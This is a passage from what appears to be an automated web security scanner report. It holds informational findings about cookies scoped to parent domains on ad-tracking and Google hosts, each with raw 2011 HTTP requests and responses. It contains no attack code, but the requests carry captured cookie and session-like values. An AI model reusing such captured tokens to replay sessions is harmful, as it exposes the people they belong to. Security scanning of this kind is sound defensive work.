Cookie: s_vi=[CS]v1|26D7B9FD85162B9C-600001848003F046[CE]; POD=us~en; s_vnum_us=ch%3Ditunes%26vn%3D1%3Bch%3Dsupport%26vn%3D1%3B; ac_survey=1

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Apr 2011 16:46:06 GMT
ETag: "290c-4a15c5c648f80"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
Cteonnt-Length: 10508
Content-Type: text/css
Cache-Control: max-age=521
Expires: Thu, 05 May 2011 12:52:02 GMT
Date: Thu, 05 May 2011 12:43:21 GMT
Connection: close
Set-Cookie: ccl=B5ebQMrboP/GSTm8I+6Sg1qQULUt3cGrRwZyioHji6hbHFZ2wRYZ4hnLCzAmoaD1jiO8RqoLIhT9+xUZPzXnAdntHreObH6THD4IhsBMGdYx8KVcAZcNFgCOUqj115aVGadV85bVoFGsDegaFsOjy3wsZurD89dX1RTm+OGdPQXwdO6Mo/53N2M6/xN6zsXAOPmNWeI6RT77VPGQDAFPK503AxWpiaMY6zKRg1tdJlwQUHU/9lKIqyiSPDuTDj9yV/0D6lo7B/Nkm0eoIaudf67q9FV6261SddPmqBY3uh7GpUWWHIxJMVXb/N/JrMrq5F67PgazCkgcOfBX2Wzz8UIgVnrBKihd3Khc1VbEtAew2e7TfKMB1xRi6o3YCAJzcOGlc1uyCewBfqH7Ar4AoWyAsJMyzq65jVZnLJQbxDVZ8doj45HN6BYAPR8CJXFPgvognk4DEuRv1EW93WL0lwBFCxK+lfzV/buf6UTDZwWFR9AQf2cq8+/mnlfFH7Aeo18W8lX0qpPAat0BiPGGIzIJ/HfslVi2qu1udIfVUMs0lTTNNQoTQ7ICrm3kL1cW; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com
Content-Length: 10508

/* GLOBALHEADER */
#globalheader { position:relative; display:block; width:980px; height:36px; margin:18px auto; text-align:left; z-index:9998; background:url(/global/nav/images/globalheader.png) repe
...[SNIP]...

16.76. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDUzMTA5NzsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=nubwN5pqEIxFG6povUg3sY4QSKMCItdxihQ3WXsYIoLOGLGCKGexihQ3gZsYIMa4FLGCEGexihAmoZsYIwtlGLGCA9qxihw2kXsYIsijGLGCGenxihQQvasYI0kmGLGC3mpxiVrqFoxsGOUtrWQIza0bRGQBg2cBYam5IasExOSBsRpxv1I9HsfzFr9i4WQBwWIomtCqGgKseWw7RasrVSfBrLqhgOJUFQT2F7KruXQAzZsr0KXBbzqxum6BF8sXG7KogZwrgYANzWtBkoqhCO67GcNNGqbkAfwuRXwoum/BEOphQPLUHsEpGuNq+fQoeZc4fOMCgwhRJU7/IUJtGcmZpTrBfC; F1=Bc6uB3EBAAAABAAAAEAAgEA; BASE=Rgwq3yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9pF!; ROLL=boAno2Cov1BgAaG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=4WfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAH; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/
Set-Cookie: GUID=MTMwNDU1Njk4NDsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Thu, 05 May 2011 01:56:24 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

16.77. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=916aad4fa2d46b54:TM=1304592793:LM=1304592793:S=ngvj94qxaaorD5lW; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

16.78. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4480baab36f5fc64:TM=1304592793:LM=1304592793:S=1c2dl40v_hgXyUwI; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

16.79. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /data/feed/base/user/h02332/albumid/5537331698402427137

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/feed/base/user/h02332/albumid/5537331698402427137 HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 05 May 2011 10:53:27 GMT
Date: Thu, 05 May 2011 10:53:27 GMT
Cache-Control: private, max-age=0, must-revalidate, no-transform
Set-Cookie: _rtok=zhiANk2TsO4s; Path=/; HttpOnly
Set-Cookie: S=photos_html=77povLnDncriQMlvMK8fnQ; Domain=.google.com; Path=/; HttpOnly
Content-Type: application/atom+xml; charset=UTF-8
Vary: Accept, X-GData-Authorization, GData-Version, Cookie
GData-Version: 1.0
Last-Modified: Fri, 01 Apr 2011 15:31:40 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:gphoto='http://schemas.google.com/photos/2007' xmlns:media='http://search.yahoo.com/mrss/' xmlns:openSearch='http:
...[SNIP]...

16.80. http://picasaweb.google.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Thu, 05 May 2011 10:53:30 GMT
Date: Thu, 05 May 2011 10:53:30 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=exrwsP6mSpIL; Path=/; HttpOnly
Set-Cookie: S=photos_html=2Z1FyatXMiLJ8zPEv8c_zA; Domain=.google.com; Path=/; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=https%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttps%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

16.81. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Thu, 05 May 2011 10:53:31 GMT
Date: Thu, 05 May 2011 10:53:31 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=SIFFmD1DIHx0; Path=/; HttpOnly
Set-Cookie: S=photos_html=vKILXVHQkpet2Ha2vuZN6w; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

16.82. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1375825468;fpan=1;fpa=P0-1909268260-1304575044578;ns=0;url=http%3A%2F%2Fwww.truveo.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304575044577;tzo=300;a=p-69y4MvfNUPaiY HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EAcAGO8kjVmtjIMIufKMgQG2AQHVBoHTAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGdGCu2CWsYNcdDECEYILsywS0zQjCCAwLhHxjjgv8ZIA6JIA4QC-ILZLEILRiysZSjiyM

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ECQAGO8kjVmtjIMIufKMgQG2AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGdGCu2CWsYNcdDECEYILsywS0zQjCCAwLhHxjjgv8ZIA6JIA4QC-ILZLEILRiysZSjiyM; expires=Wed, 03-Aug-2011 00:57:27 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 05 May 2011 00:57:27 GMT
Server: QS


16.83. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-3aud4J6uA4Z6Y.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-3aud4J6uA4Z6Y.gif?labels=InvisibleBox&busty=7596 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EC0AGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=23864&partnerID=77&clientID=1679&key=segment&pb=0
Set-Cookie: d=EAsAGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizFILKjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 01:00:39 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 05 May 2011 01:00:39 GMT
Server: QS


16.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-444Ux5EmpXDp6.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-444Ux5EmpXDp6.gif?labels=19677.16 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EBYAGO8kjVmtjIMIufKMgQG0AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFoogRu2CWsYNcdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1232531&t=2
Set-Cookie: d=EC0AGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 00:59:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 05 May 2011 00:59:45 GMT
Server: QS


16.85. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=/GowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=B8bgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 2088728852=_4dc1f5d8,2088728852,743226^894907^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.86. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
